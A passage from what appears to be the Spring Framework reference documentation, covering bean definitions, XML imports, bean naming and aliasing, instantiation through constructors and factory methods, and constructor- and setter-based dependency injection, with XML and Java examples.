the\nprevious section. Alternatively, use one or more occurrences of the `<import\/>` element\nto load bean definitions from another file or files. 
For example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<import resource=\"services.xml\"\/>\n\t\t<import resource=\"resources\/messageSource.xml\"\/>\n\t\t<import resource=\"\/resources\/themeSource.xml\"\/>\n\n\t\t<bean id=\"bean1\" class=\"...\"\/>\n\t\t<bean id=\"bean2\" class=\"...\"\/>\n\t<\/beans>\n----\n\nIn the preceding example, external bean definitions are loaded from three files:\n`services.xml`, `messageSource.xml`, and `themeSource.xml`. All location paths are\nrelative to the definition file doing the importing, so `services.xml` must be in the\nsame directory or classpath location as the file doing the importing, while\n`messageSource.xml` and `themeSource.xml` must be in a `resources` location below the\nlocation of the importing file. As you can see, a leading slash is ignored, but given\nthat these paths are relative, it is better form not to use the slash at all. The\ncontents of the files being imported, including the top level `<beans\/>` element, must\nbe valid XML bean definitions according to the Spring Schema.\n\n[NOTE]\n====\nIt is possible, but not recommended, to reference files in parent directories using a\nrelative \"..\/\" path. Doing so creates a dependency on a file that is outside the current\napplication. In particular, this reference is not recommended for \"classpath:\" URLs (for\nexample, \"classpath:..\/services.xml\"), where the runtime resolution process chooses the\n\"nearest\" classpath root and then looks into its parent directory. Classpath\nconfiguration changes may lead to the choice of a different, incorrect directory.\n\nYou can always use fully qualified resource locations instead of relative paths: for\nexample, \"file:C:\/config\/services.xml\" or \"classpath:\/config\/services.xml\". However, be\naware that you are coupling your application's configuration to specific absolute\nlocations. It is generally preferable to keep an indirection for such absolute\nlocations, for example, through \"${...}\" placeholders that are resolved against JVM\nsystem properties at runtime.\n====\n\n\n\n[[beans-factory-client]]\n=== Using the container\n\nThe `ApplicationContext` is the interface for an advanced factory capable of maintaining\na registry of different beans and their dependencies. Using the method `T getBean(String\nname, Class<T> requiredType)` you can retrieve instances of your beans.\n\nThe `ApplicationContext` enables you to read bean definitions and access them as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ create and configure beans\n\tApplicationContext context =\n\t\tnew ClassPathXmlApplicationContext(new String[] {\"services.xml\", \"daos.xml\"});\n\n\t\/\/ retrieve configured instance\n\tPetStoreService service = context.getBean(\"petStore\", PetStoreService.class);\n\n\t\/\/ use configured instance\n\tList<String> userList = service.getUsernameList();\n----\n\nYou use `getBean()` to retrieve instances of your beans. The `ApplicationContext`\ninterface has a few other methods for retrieving beans, but ideally your application\ncode should never use them. Indeed, your application code should have no calls to the\n`getBean()` method at all, and thus no dependency on Spring APIs at all. For example,\nSpring's integration with web frameworks provides for dependency injection for various\nweb framework classes such as controllers and JSF-managed beans.\n\n\n\n\n[[beans-definition]]\n== Bean overview\nA Spring IoC container manages one or more __beans__. 
These beans are created with the
configuration metadata that you supply to the container, for example, in the form of XML
`<bean/>` definitions.

Within the container itself, these bean definitions are represented as `BeanDefinition`
objects, which contain (among other information) the following metadata:

* __A package-qualified class name:__ typically the actual implementation class of the
 bean being defined.
* Bean behavioral configuration elements, which state how the bean should behave in the
 container (scope, lifecycle callbacks, and so forth).
* References to other beans that are needed for the bean to do its work; these
 references are also called __collaborators__ or __dependencies__.
* Other configuration settings to set in the newly created object, for example, the
 number of connections to use in a bean that manages a connection pool, or the size
 limit of the pool.

This metadata translates to a set of properties that make up each bean definition.

[[beans-factory-bean-definition-tbl]]
.The bean definition
|===
| Property | Explained in...

| class
| <<beans-factory-class>>

| name
| <<beans-beanname>>

| scope
| <<beans-factory-scopes>>

| constructor arguments
| <<beans-factory-collaborators>>

| properties
| <<beans-factory-collaborators>>

| autowiring mode
| <<beans-factory-autowire>>

| lazy-initialization mode
| <<beans-factory-lazy-init>>

| initialization method
| <<beans-factory-lifecycle-initializingbean>>

| destruction method
| <<beans-factory-lifecycle-disposablebean>>
|===

In addition to bean definitions that contain information on how to create a specific
bean, the `ApplicationContext` implementations also permit the registration of existing
objects that are created outside the container, by users. This is done by accessing the
`ApplicationContext`'s `BeanFactory` via the method `getBeanFactory()`, which returns the
`BeanFactory` implementation `DefaultListableBeanFactory`. `DefaultListableBeanFactory`
supports this registration through the methods `registerSingleton(..)` and
`registerBeanDefinition(..)`. However, typical applications work solely with beans
defined through metadata bean definitions.

[NOTE]
====
Bean metadata and manually supplied singleton instances need to be registered as early
as possible, in order for the container to properly reason about them during autowiring
and other introspection steps. While overriding of existing metadata and existing
singleton instances is supported to some degree, the registration of new beans at
runtime (concurrently with live access to the factory) is not officially supported and
may lead to concurrent access exceptions and/or inconsistent state in the bean container.
====



[[beans-beanname]]
=== Naming beans

Every bean has one or more identifiers. These identifiers must be unique within the
container that hosts the bean. A bean usually has only one identifier, but if it
requires more than one, the extra ones can be considered aliases.

In XML-based configuration metadata, you use the `id` and/or `name` attributes
to specify the bean identifier(s). The `id` attribute allows you to specify
exactly one id. Conventionally, these names are alphanumeric ('myBean',
'fooService', etc.), but may contain special characters as well. If you want to
introduce other aliases to the bean, you can also specify them in the `name`
attribute, separated by a comma (`,`), semicolon (`;`), or white space.
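
If you use Java configuration, the rough equivalent is to list several names on a single
`@Bean` method, where the first name is treated as the primary identifier and the rest
as aliases. A minimal sketch (the service class and bean names here are made up):

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Configuration
	public class AppConfig {

		// registered under 'accountService', with 'accountManager' as an alias
		@Bean(name = {"accountService", "accountManager"})
		public AccountService accountService() {
			return new AccountServiceImpl();
		}
	}
----
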
As a historical note, in versions prior to Spring 3.1, the `id` attribute was
defined as an `xsd:ID` type, which constrained possible characters. As of 3.1,
it is defined as an `xsd:string` type. Note that bean `id` uniqueness is still
enforced by the container, though no longer by XML parsers.

You are not required to supply a name or id for a bean. If no name or id is supplied
explicitly, the container generates a unique name for that bean. However, if you want to
refer to that bean by name, through the use of the `ref` element or
<<beans-servicelocator,Service Locator>> style lookup, you must provide a name.
Motivations for not supplying a name are related to using <<beans-inner-beans,inner
beans>> and <<beans-factory-autowire,autowiring collaborators>>.

.Bean Naming Conventions
****
The convention is to use the standard Java convention for instance field names when
naming beans. That is, bean names start with a lowercase letter, and are camel-cased
from then on. Examples of such names would be (without quotes) `'accountManager'`,
`'accountService'`, `'userDao'`, `'loginController'`, and so forth.

Naming beans consistently makes your configuration easier to read and understand, and if
you are using Spring AOP, it helps a lot when applying advice to a set of beans related
by name.
****

[NOTE]
====
With component scanning in the classpath, Spring generates bean names for unnamed
components, following the rules above: essentially, taking the simple class name
and turning its initial character to lower-case. However, in the (unusual) special
case when there is more than one character and both the first and second characters
are upper case, the original casing gets preserved. These are the same rules as
defined by `java.beans.Introspector.decapitalize` (which Spring is using here).
====


[[beans-beanname-alias]]
==== Aliasing a bean outside the bean definition

In a bean definition itself, you can supply more than one name for the bean, by using a
combination of up to one name specified by the `id` attribute, and any number of other
names in the `name` attribute. These names can be equivalent aliases to the same bean,
and are useful for some situations, such as allowing each component in an application to
refer to a common dependency by using a bean name that is specific to that component
itself.

Specifying all aliases where the bean is actually defined is not always adequate,
however. It is sometimes desirable to introduce an alias for a bean that is defined
elsewhere. This is commonly the case in large systems where configuration is split
among the subsystems, with each subsystem having its own set of object definitions. In
XML-based configuration metadata, you can use the `<alias/>` element to accomplish this.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<alias name="fromName" alias="toName"/>
----

In this case, a bean in the same container named `fromName` may also, after the use of
this alias definition, be referred to as `toName`.

For example, the configuration metadata for subsystem A may refer to a DataSource via
the name `subsystemA-dataSource`. The configuration metadata for subsystem B may refer to
a DataSource via the name `subsystemB-dataSource`. When composing the main application
that uses both these subsystems, the main application refers to the DataSource via the
name `myApp-dataSource`.
To have all three names refer to the same object, you add the following alias
definitions to the MyApp configuration metadata:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<alias name="subsystemA-dataSource" alias="subsystemB-dataSource"/>
	<alias name="subsystemA-dataSource" alias="myApp-dataSource"/>
----

Now each component and the main application can refer to the dataSource through a name
that is unique and guaranteed not to clash with any other definition (effectively
creating a namespace), yet they refer to the same bean.

.Java-configuration
****
If you are using Java-configuration, the `@Bean` annotation can be used to provide
aliases; see <<beans-java-bean-annotation>> for details.
****

[[beans-factory-class]]
=== Instantiating beans

A bean definition is essentially a recipe for creating one or more objects. The
container looks at the recipe for a named bean when asked, and uses the configuration
metadata encapsulated by that bean definition to create (or acquire) an actual object.

If you use XML-based configuration metadata, you specify the type (or class) of object
that is to be instantiated in the `class` attribute of the `<bean/>` element. This
`class` attribute, which internally is a `Class` property on a `BeanDefinition`
instance, is usually mandatory. (For exceptions, see
<<beans-factory-class-instance-factory-method>> and <<beans-child-bean-definitions>>.)
You use the `Class` property in one of two ways:

* Typically, to specify the bean class to be constructed in the case where the container
 itself directly creates the bean by calling its constructor reflectively, somewhat
 equivalent to Java code using the `new` operator.
* To specify the actual class containing the `static` factory method that will be
 invoked to create the object, in the less common case where the container invokes a
 `static` __factory__ method on a class to create the bean. The object type returned
 from the invocation of the `static` factory method may be the same class or another
 class entirely.

.Inner class names
****
If you want to configure a bean definition for a `static` nested class, you have to use
the __binary__ name of the nested class.

For example, if you have a class called `Foo` in the `com.example` package, and this
`Foo` class has a `static` nested class called `Bar`, the value of the `'class'`
attribute on a bean definition would be...

`com.example.Foo$Bar`

Notice the use of the `$` character in the name to separate the nested class name from
the outer class name.
****


[[beans-factory-class-ctor]]
==== Instantiation with a constructor

When you create a bean by the constructor approach, all normal classes are usable by and
compatible with Spring. That is, the class being developed does not need to implement
any specific interfaces or to be coded in a specific fashion. Simply specifying the bean
class should suffice. However, depending on what type of IoC you use for that specific
bean, you may need a default (empty) constructor.

The Spring IoC container can manage virtually __any__ class you want it to manage; it is
not limited to managing true JavaBeans. Most Spring users prefer actual JavaBeans with
only a default (no-argument) constructor and appropriate setters and getters modeled
after the properties in the container. You can also have more exotic non-bean-style
classes in your container.
If, for example, you need to use a legacy connection pool\nthat absolutely does not adhere to the JavaBean specification, Spring can manage it as\nwell.\n\nWith XML-based configuration metadata you can specify your bean class as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\"\/>\n\n\t<bean name=\"anotherExample\" class=\"examples.ExampleBeanTwo\"\/>\n----\n\nFor details about the mechanism for supplying arguments to the constructor (if required)\nand setting object instance properties after the object is constructed, see\n<<beans-factory-collaborators,Injecting Dependencies>>.\n\n\n[[beans-factory-class-static-factory-method]]\n==== Instantiation with a static factory method\n\nWhen defining a bean that you create with a static factory method, you use the `class`\nattribute to specify the class containing the `static` factory method and an attribute\nnamed `factory-method` to specify the name of the factory method itself. You should be\nable to call this method (with optional arguments as described later) and return a live\nobject, which subsequently is treated as if it had been created through a constructor.\nOne use for such a bean definition is to call `static` factories in legacy code.\n\nThe following bean definition specifies that the bean will be created by calling a\nfactory-method. The definition does not specify the type (class) of the returned object,\nonly the class containing the factory method. In this example, the `createInstance()`\nmethod must be a __static__ method.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"clientService\"\n\t\tclass=\"examples.ClientService\"\n\t\tfactory-method=\"createInstance\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ClientService {\n\t\tprivate static ClientService clientService = new ClientService();\n\t\tprivate ClientService() {}\n\n\t\tpublic static ClientService createInstance() {\n\t\t\treturn clientService;\n\t\t}\n\t}\n----\n\nFor details about the mechanism for supplying (optional) arguments to the factory method\nand setting object instance properties after the object is returned from the factory,\nsee <<beans-factory-properties-detailed,Dependencies and configuration in detail>>.\n\n\n[[beans-factory-class-instance-factory-method]]\n==== Instantiation using an instance factory method\n\nSimilar to instantiation through a <<beans-factory-class-static-factory-method,static\nfactory method>>, instantiation with an instance factory method invokes a non-static\nmethod of an existing bean from the container to create a new bean. To use this\nmechanism, leave the `class` attribute empty, and in the `factory-bean` attribute,\nspecify the name of a bean in the current (or parent\/ancestor) container that contains\nthe instance method that is to be invoked to create the object. 
Set the name of the
factory method itself with the `factory-method` attribute.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<!-- the factory bean, which contains a method called createInstance() -->
	<bean id="serviceLocator" class="examples.DefaultServiceLocator">
		<!-- inject any dependencies required by this locator bean -->
	</bean>

	<!-- the bean to be created via the factory bean -->
	<bean id="clientService"
		factory-bean="serviceLocator"
		factory-method="createClientServiceInstance"/>
----

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class DefaultServiceLocator {

		private static ClientService clientService = new ClientServiceImpl();
		private DefaultServiceLocator() {}

		public ClientService createClientServiceInstance() {
			return clientService;
		}
	}
----

One factory class can also hold more than one factory method, as shown here:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="serviceLocator" class="examples.DefaultServiceLocator">
		<!-- inject any dependencies required by this locator bean -->
	</bean>

	<bean id="clientService"
		factory-bean="serviceLocator"
		factory-method="createClientServiceInstance"/>

	<bean id="accountService"
		factory-bean="serviceLocator"
		factory-method="createAccountServiceInstance"/>
----

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class DefaultServiceLocator {

		private static ClientService clientService = new ClientServiceImpl();
		private static AccountService accountService = new AccountServiceImpl();

		private DefaultServiceLocator() {}

		public ClientService createClientServiceInstance() {
			return clientService;
		}

		public AccountService createAccountServiceInstance() {
			return accountService;
		}

	}
----

This approach shows that the factory bean itself can be managed and configured through
dependency injection (DI). See <<beans-factory-properties-detailed,Dependencies and
configuration in detail>>.

[NOTE]
====
In Spring documentation, __factory bean__ refers to a bean that is configured in the
Spring container that will create objects through an
<<beans-factory-class-instance-factory-method,instance>> or
<<beans-factory-class-static-factory-method,static>> factory method. By contrast,
`FactoryBean` (notice the capitalization) refers to a Spring-specific
<<beans-factory-extension-factorybean,`FactoryBean`>>.
====




[[beans-dependencies]]
== Dependencies
A typical enterprise application does not consist of a single object (or bean in the
Spring parlance). Even the simplest application has a few objects that work together to
present what the end-user sees as a coherent application. This next section explains how
you go from defining a number of bean definitions that stand alone to a fully realized
application where objects collaborate to achieve a goal.



[[beans-factory-collaborators]]
=== Dependency Injection

__Dependency injection__ (DI) is a process whereby objects define their dependencies,
that is, the other objects they work with, only through constructor arguments, arguments
to a factory method, or properties that are set on the object instance after it is
constructed or returned from a factory method. The container then __injects__ those
dependencies when it creates the bean.
This process is fundamentally the inverse, hence
the name __Inversion of Control__ (IoC), of the bean itself controlling the instantiation
or location of its dependencies on its own by using direct construction of classes, or
the __Service Locator__ pattern.

Code is cleaner with the DI principle, and decoupling is more effective when objects are
provided with their dependencies. The object does not look up its dependencies, and does
not know the location or class of the dependencies. As such, your classes become easier
to test, in particular when the dependencies are on interfaces or abstract base classes,
which allow for stub or mock implementations to be used in unit tests.

DI exists in two major variants: <<beans-constructor-injection,Constructor-based
dependency injection>> and <<beans-setter-injection,Setter-based dependency injection>>.


[[beans-constructor-injection]]
==== Constructor-based dependency injection

__Constructor-based__ DI is accomplished by the container invoking a constructor with a
number of arguments, each representing a dependency. Calling a `static` factory method
with specific arguments to construct the bean is nearly equivalent, and this discussion
treats arguments to a constructor and to a `static` factory method similarly. The
following example shows a class that can only be dependency-injected with constructor
injection. Notice that there is nothing __special__ about this class; it is a POJO that
has no dependencies on container-specific interfaces, base classes, or annotations.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class SimpleMovieLister {

		// the SimpleMovieLister has a dependency on a MovieFinder
		private MovieFinder movieFinder;

		// a constructor so that the Spring container can inject a MovieFinder
		public SimpleMovieLister(MovieFinder movieFinder) {
			this.movieFinder = movieFinder;
		}

		// business logic that actually uses the injected MovieFinder is omitted...

	}
----

[[beans-factory-ctor-arguments-resolution]]
===== Constructor argument resolution

Constructor argument resolution matching occurs using the argument's type. If no
potential ambiguity exists in the constructor arguments of a bean definition, then the
order in which the constructor arguments are defined in a bean definition is the order
in which those arguments are supplied to the appropriate constructor when the bean is
being instantiated. Consider the following class:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	package x.y;

	public class Foo {

		public Foo(Bar bar, Baz baz) {
			// ...
		}

	}
----

No potential ambiguity exists, assuming that the `Bar` and `Baz` classes are not related
by inheritance. Thus the following configuration works fine, and you do not need to
specify the constructor argument indexes and/or types explicitly in the
`<constructor-arg/>` element.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans>
		<bean id="foo" class="x.y.Foo">
			<constructor-arg ref="bar"/>
			<constructor-arg ref="baz"/>
		</bean>

		<bean id="bar" class="x.y.Bar"/>

		<bean id="baz" class="x.y.Baz"/>
	</beans>
----

When another bean is referenced, the type is known, and matching can occur (as was the
case with the preceding example).
When a simple type is used, such as
`<value>true</value>`, Spring cannot determine the type of the value, and so cannot match
by type without help. Consider the following class:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	package examples;

	public class ExampleBean {

		// Number of years to calculate the Ultimate Answer
		private int years;

		// The Answer to Life, the Universe, and Everything
		private String ultimateAnswer;

		public ExampleBean(int years, String ultimateAnswer) {
			this.years = years;
			this.ultimateAnswer = ultimateAnswer;
		}

	}
----

.[[beans-factory-ctor-arguments-type]]Constructor argument type matching
--
In the preceding scenario, the container __can__ use type matching with simple types if
you explicitly specify the type of the constructor argument using the `type` attribute.
For example:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="exampleBean" class="examples.ExampleBean">
		<constructor-arg type="int" value="7500000"/>
		<constructor-arg type="java.lang.String" value="42"/>
	</bean>
----
--

.[[beans-factory-ctor-arguments-index]]Constructor argument index
--
Use the `index` attribute to specify explicitly the index of constructor arguments. For
example:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="exampleBean" class="examples.ExampleBean">
		<constructor-arg index="0" value="7500000"/>
		<constructor-arg index="1" value="42"/>
	</bean>
----

In addition to resolving the ambiguity of multiple simple values, specifying an index
resolves ambiguity where a constructor has two arguments of the same type. Note that the
__index is 0-based__.
--

.[[beans-factory-ctor-arguments-name]]Constructor argument name
--
You can also use the constructor parameter name for value disambiguation:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="exampleBean" class="examples.ExampleBean">
		<constructor-arg name="years" value="7500000"/>
		<constructor-arg name="ultimateAnswer" value="42"/>
	</bean>
----

Keep in mind that, to make this work out of the box, your code must be compiled with the
debug flag enabled so that Spring can look up the parameter name from the constructor.
If you cannot compile your code with the debug flag (or do not want to), you can use the
http://download.oracle.com/javase/6/docs/api/java/beans/ConstructorProperties.html[@ConstructorProperties]
JDK annotation to name your constructor arguments explicitly. The sample class would
then have to look as follows:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	package examples;

	public class ExampleBean {

		// Fields omitted

		@ConstructorProperties({"years", "ultimateAnswer"})
		public ExampleBean(int years, String ultimateAnswer) {
			this.years = years;
			this.ultimateAnswer = ultimateAnswer;
		}

	}
----
--


[[beans-setter-injection]]
==== Setter-based dependency injection

__Setter-based__ DI is accomplished by the container calling setter methods on your
beans after invoking a no-argument constructor or no-argument `static` factory method to
instantiate your bean.

The following example shows a class that can only be dependency-injected using pure
setter injection. This class is conventional Java.
It is a POJO that has no dependencies
on container-specific interfaces, base classes, or annotations.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class SimpleMovieLister {

		// the SimpleMovieLister has a dependency on the MovieFinder
		private MovieFinder movieFinder;

		// a setter method so that the Spring container can inject a MovieFinder
		public void setMovieFinder(MovieFinder movieFinder) {
			this.movieFinder = movieFinder;
		}

		// business logic that actually uses the injected MovieFinder is omitted...

	}
----

The `ApplicationContext` supports constructor-based and setter-based DI for the beans it
manages. It also supports setter-based DI after some dependencies have already been
injected through the constructor approach. You configure the dependencies in the form of
a `BeanDefinition`, which you use in conjunction with `PropertyEditor` instances to
convert properties from one format to another. However, most Spring users do not work
with these classes directly (i.e., programmatically) but rather with XML `bean`
definitions, annotated components (i.e., classes annotated with `@Component`,
`@Controller`, etc.), or `@Bean` methods in Java-based `@Configuration` classes. These
sources are then converted internally into instances of `BeanDefinition` and used to
load an entire Spring IoC container instance.

.Constructor-based or setter-based DI?
****
Since you can mix constructor-based and setter-based DI, it is a good rule of thumb to
use constructors for _mandatory dependencies_ and setter methods or configuration methods
for _optional dependencies_. Note that the <<beans-required-annotation,@Required>>
annotation on a setter method can be used to make the property a required dependency.

The Spring team generally advocates constructor injection as it enables one to implement
application components as _immutable objects_ and to ensure that required dependencies
are not `null`. Furthermore, constructor-injected components are always returned to client
(calling) code in a fully initialized state. As a side note, a large number of constructor
arguments is a _bad code smell_, implying that the class likely has too many
responsibilities and should be refactored to better address proper separation of concerns.

Setter injection should primarily be used only for optional dependencies that can be
assigned reasonable default values within the class. Otherwise, not-null checks must be
performed everywhere the code uses the dependency. One benefit of setter injection is that
setter methods make objects of that class amenable to reconfiguration or re-injection
later. Management through <<jmx,JMX MBeans>> is therefore a compelling use case for setter
injection.

Use the DI style that makes the most sense for a particular class. Sometimes, when dealing
with third-party classes for which you do not have the source, the choice is made for you.
For example, if a third-party class does not expose any setter methods, then constructor
injection may be the only available form of DI.
****


[[beans-dependency-resolution]]
==== Dependency resolution process

The container performs bean dependency resolution as follows:

* The `ApplicationContext` is created and initialized with configuration metadata that
 describes all the beans.
Configuration metadata can be specified via XML, Java code, or\n annotations.\n* For each bean, its dependencies are expressed in the form of properties, constructor\n arguments, or arguments to the static-factory method if you are using that instead of\n a normal constructor. These dependencies are provided to the bean, __when the bean is\n actually created__.\n* Each property or constructor argument is an actual definition of the value to set, or\n a reference to another bean in the container.\n* Each property or constructor argument which is a value is converted from its specified\n format to the actual type of that property or constructor argument. By default Spring\n can convert a value supplied in string format to all built-in types, such as `int`,\n `long`, `String`, `boolean`, etc.\n\nThe Spring container validates the configuration of each bean as the container is created.\nHowever, the bean properties themselves are not set until the bean __is actually created__.\nBeans that are singleton-scoped and set to be pre-instantiated (the default) are created\nwhen the container is created. Scopes are defined in <<beans-factory-scopes>>. Otherwise,\nthe bean is created only when it is requested. Creation of a bean potentially causes a\ngraph of beans to be created, as the bean's dependencies and its dependencies'\ndependencies (and so on) are created and assigned. Note that resolution mismatches among\nthose dependencies may show up late, i.e. on first creation of the affected bean.\n\n.Circular dependencies\n****\nIf you use predominantly constructor injection, it is possible to create an unresolvable\ncircular dependency scenario.\n\nFor example: Class A requires an instance of class B through constructor injection, and\nclass B requires an instance of class A through constructor injection. If you configure\nbeans for classes A and B to be injected into each other, the Spring IoC container\ndetects this circular reference at runtime, and throws a\n`BeanCurrentlyInCreationException`.\n\nOne possible solution is to edit the source code of some classes to be configured by\nsetters rather than constructors. Alternatively, avoid constructor injection and use\nsetter injection only. In other words, although it is not recommended, you can configure\ncircular dependencies with setter injection.\n\nUnlike the __typical__ case (with no circular dependencies), a circular dependency\nbetween bean A and bean B forces one of the beans to be injected into the other prior to\nbeing fully initialized itself (a classic chicken\/egg scenario).\n****\n\nYou can generally trust Spring to do the right thing. It detects configuration problems,\nsuch as references to non-existent beans and circular dependencies, at container\nload-time. Spring sets properties and resolves dependencies as late as possible, when\nthe bean is actually created. This means that a Spring container which has loaded\ncorrectly can later generate an exception when you request an object if there is a\nproblem creating that object or one of its dependencies. For example, the bean throws an\nexception as a result of a missing or invalid property. This potentially delayed\nvisibility of some configuration issues is why `ApplicationContext` implementations by\ndefault pre-instantiate singleton beans. At the cost of some upfront time and memory to\ncreate these beans before they are actually needed, you discover configuration issues\nwhen the `ApplicationContext` is created, not later. 
You can still override this default\nbehavior so that singleton beans will lazy-initialize, rather than be pre-instantiated.\n\nIf no circular dependencies exist, when one or more collaborating beans are being\ninjected into a dependent bean, each collaborating bean is __totally__ configured prior\nto being injected into the dependent bean. This means that if bean A has a dependency on\nbean B, the Spring IoC container completely configures bean B prior to invoking the\nsetter method on bean A. In other words, the bean is instantiated (if not a\npre-instantiated singleton), its dependencies are set, and the relevant lifecycle\nmethods (such as a <<beans-factory-lifecycle-initializingbean,configured init method>>\nor the <<beans-factory-lifecycle-initializingbean,InitializingBean callback method>>)\nare invoked.\n\n\n[[beans-some-examples]]\n==== Examples of dependency injection\n\nThe following example uses XML-based configuration metadata for setter-based DI. A small\npart of a Spring XML configuration file specifies some bean definitions:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\">\n\t\t<!-- setter injection using the nested ref element -->\n\t\t<property name=\"beanOne\">\n\t\t\t<ref bean=\"anotherExampleBean\"\/>\n\t\t<\/property>\n\n\t\t<!-- setter injection using the neater ref attribute -->\n\t\t<property name=\"beanTwo\" ref=\"yetAnotherBean\"\/>\n\t\t<property name=\"integerProperty\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"anotherExampleBean\" class=\"examples.AnotherBean\"\/>\n\t<bean id=\"yetAnotherBean\" class=\"examples.YetAnotherBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\tprivate AnotherBean beanOne;\n\t\tprivate YetAnotherBean beanTwo;\n\t\tprivate int i;\n\n\t\tpublic void setBeanOne(AnotherBean beanOne) {\n\t\t\tthis.beanOne = beanOne;\n\t\t}\n\n\t\tpublic void setBeanTwo(YetAnotherBean beanTwo) {\n\t\t\tthis.beanTwo = beanTwo;\n\t\t}\n\n\t\tpublic void setIntegerProperty(int i) {\n\t\t\tthis.i = i;\n\t\t}\n\n\t}\n----\n\nIn the preceding example, setters are declared to match against the properties specified\nin the XML file. 
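
For comparison, a rough Java-configuration equivalent of the same setter-based wiring
might look as follows; this is a sketch that reuses the example classes above (the
configuration class name is made up):

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Configuration
	public class ExampleConfig {

		@Bean
		public AnotherBean anotherExampleBean() {
			return new AnotherBean();
		}

		@Bean
		public YetAnotherBean yetAnotherBean() {
			return new YetAnotherBean();
		}

		@Bean
		public ExampleBean exampleBean() {
			// call the setters directly, mirroring the <property/> entries
			ExampleBean bean = new ExampleBean();
			bean.setBeanOne(anotherExampleBean());
			bean.setBeanTwo(yetAnotherBean());
			bean.setIntegerProperty(1);
			return bean;
		}
	}
----
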
The following example uses constructor-based DI:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\">\n\t\t<!-- constructor injection using the nested ref element -->\n\t\t<constructor-arg>\n\t\t\t<ref bean=\"anotherExampleBean\"\/>\n\t\t<\/constructor-arg>\n\n\t\t<!-- constructor injection using the neater ref attribute -->\n\t\t<constructor-arg ref=\"yetAnotherBean\"\/>\n\n\t\t<constructor-arg type=\"int\" value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"anotherExampleBean\" class=\"examples.AnotherBean\"\/>\n\t<bean id=\"yetAnotherBean\" class=\"examples.YetAnotherBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\tprivate AnotherBean beanOne;\n\t\tprivate YetAnotherBean beanTwo;\n\t\tprivate int i;\n\n\t\tpublic ExampleBean(\n\t\t\tAnotherBean anotherBean, YetAnotherBean yetAnotherBean, int i) {\n\t\t\tthis.beanOne = anotherBean;\n\t\t\tthis.beanTwo = yetAnotherBean;\n\t\t\tthis.i = i;\n\t\t}\n\n\t}\n----\n\nThe constructor arguments specified in the bean definition will be used as arguments to\nthe constructor of the `ExampleBean`.\n\nNow consider a variant of this example, where instead of using a constructor, Spring is\ntold to call a `static` factory method to return an instance of the object:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\" factory-method=\"createInstance\">\n\t\t<constructor-arg ref=\"anotherExampleBean\"\/>\n\t\t<constructor-arg ref=\"yetAnotherBean\"\/>\n\t\t<constructor-arg value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"anotherExampleBean\" class=\"examples.AnotherBean\"\/>\n\t<bean id=\"yetAnotherBean\" class=\"examples.YetAnotherBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\t\/\/ a private constructor\n\t\tprivate ExampleBean(...) {\n\t\t\t...\n\t\t}\n\n\t\t\/\/ a static factory method; the arguments to this method can be\n\t\t\/\/ considered the dependencies of the bean that is returned,\n\t\t\/\/ regardless of how those arguments are actually used.\n\t\tpublic static ExampleBean createInstance (\n\t\t\tAnotherBean anotherBean, YetAnotherBean yetAnotherBean, int i) {\n\n\t\t\tExampleBean eb = new ExampleBean (...);\n\t\t\t\/\/ some other operations...\n\t\t\treturn eb;\n\t\t}\n\n\t}\n----\n\nArguments to the `static` factory method are supplied via `<constructor-arg\/>` elements,\nexactly the same as if a constructor had actually been used. The type of the class being\nreturned by the factory method does not have to be of the same type as the class that\ncontains the `static` factory method, although in this example it is. An instance\n(non-static) factory method would be used in an essentially identical fashion (aside\nfrom the use of the `factory-bean` attribute instead of the `class` attribute), so\ndetails will not be discussed here.\n\n\n\n[[beans-factory-properties-detailed]]\n=== Dependencies and configuration in detail\n\nAs mentioned in the previous section, you can define bean properties and constructor\narguments as references to other managed beans (collaborators), or as values defined\ninline. 
Spring's XML-based configuration metadata supports sub-element types within its
`<property/>` and `<constructor-arg/>` elements for this purpose.


[[beans-value-element]]
==== Straight values (primitives, Strings, and so on)

The `value` attribute of the `<property/>` element specifies a property or constructor
argument as a human-readable string representation. Spring's
<<core-convert-ConversionService-API,conversion service>> is used to convert these
values from a `String` to the actual type of the property or argument.

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<bean id="myDataSource" class="org.apache.commons.dbcp.BasicDataSource" destroy-method="close">
